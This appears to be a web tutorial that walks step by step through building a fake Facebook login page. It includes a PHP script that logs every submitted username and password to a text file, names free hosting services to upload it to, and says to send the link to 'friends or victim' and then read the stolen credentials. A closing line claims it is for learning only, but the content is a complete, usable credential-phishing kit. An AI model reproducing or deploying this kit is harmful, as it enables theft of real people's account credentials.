What is Phishing?

Phishing is the technique to build up a fake site or page that mirrors or looks to be another site. Hackers often use this technique to hack usernames and passwords.

Now we will create a facebook phishing page in the following steps.

Step by Step method to create Facebook Phishing Page

Step 1:- Open any web browser present in your computer such as Google Chrome. Now, visit the homepage of Facebook by typing “facebook.com” without quotes.

Step 2:- After the successful opening of the facebook login page. Right click on the page, and then click on the “View Page Source” option from the pop-up menu.

Step 3:- Now the source code of facebook will open in a new tab, all you have to do is copy this code by pressing CTRL + C after selecting all the text given (or you can copy this code by right clicking on this code page).

Step 4:- Open your text editor (I prefer to use Notepad++, you can also open windows utility text editor i.e., notepad) and paste that copied code.

 Step 5:- Press “CTRL + H” in Notepad++ and search “action” keyword for finding and replacing a line which looks like action=”https://www.facebook.com/login.php?login_attempt=1″ ( or you can open replace dialog box after clicking “Search menu” option.)

Step 6:- Delete everything written in quotes and type hack.php in the quotes. Now the line should be like this: action=”hack.php”

Step 7:- Now save this edited file as index.htm

 Step 8:- Now your phishing page is finally created.

 Step 9:- In this step create a new document in notepad++ again, named as hack.php. And paste the code given below in that document:

<?php

header (‘Location:http://www.facebook.com/’);

$handle = fopen(“usernames.txt”, “a”);

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “rn”);

}

fwrite($handle, “rn”);

fclose($handle);

exit;

?>

 Note: I have used hack.php name of this document because we have used the same name in the Step 6.

 Step 10:- Also create a blank txt file document named as usernames.txt as it is used in php file (as mentioned in Step 9).

 Step 11:- Now you have three files saved: hack.php, index.htm, and usernames.txt

 Step 12:- Next we need to upload these files to web hosting service. There are free hosting providers, but I wouldn’t recommend you to post this code. It would be better if you try this at your own webserver. However, we’ll be using 000Webhost.com in this tutorial.

 Some other free web hosting sites are:

www.5gbfree.com

www.freehosting.com

www.x10hosting.com , and many others.

 Step 13:- Now after completing Sign Up process on 000webhost, then goto control panel and then to file manager.

Step 14:- In the file manager window browse to public_html.

 Step 15:- Delete default.php file present there and upload your three files created in that folder.

 Step 16:- Now, click on the preview of index.htm file you see the fake Facebook page. Simply copy the URL from your web browser URL bar.

 Step 17:- Next, send this link to your friends or victim. Now when any of the user will enter his/her credentials then username and password will be copied in the usernames.txt

 Step 18:- Open this usernames.txt file present on the web host server to see the Facebook ID and password.

 Now, whoever who will login through this link his/her login credentials will be saved to usernames.txt file.

 NOTE: DON’t USE THIS METHOD FOR HACKING PURPOSE. THIS METHOD IS EXPLAINED FOR LEARNING PURPOSE ONLY NOT FOR HACKING PURPOSE. THIS TUTORIAL WILL HELP IN UNDERSTANDING HOW THE PHISHING ATTACK WORKS.
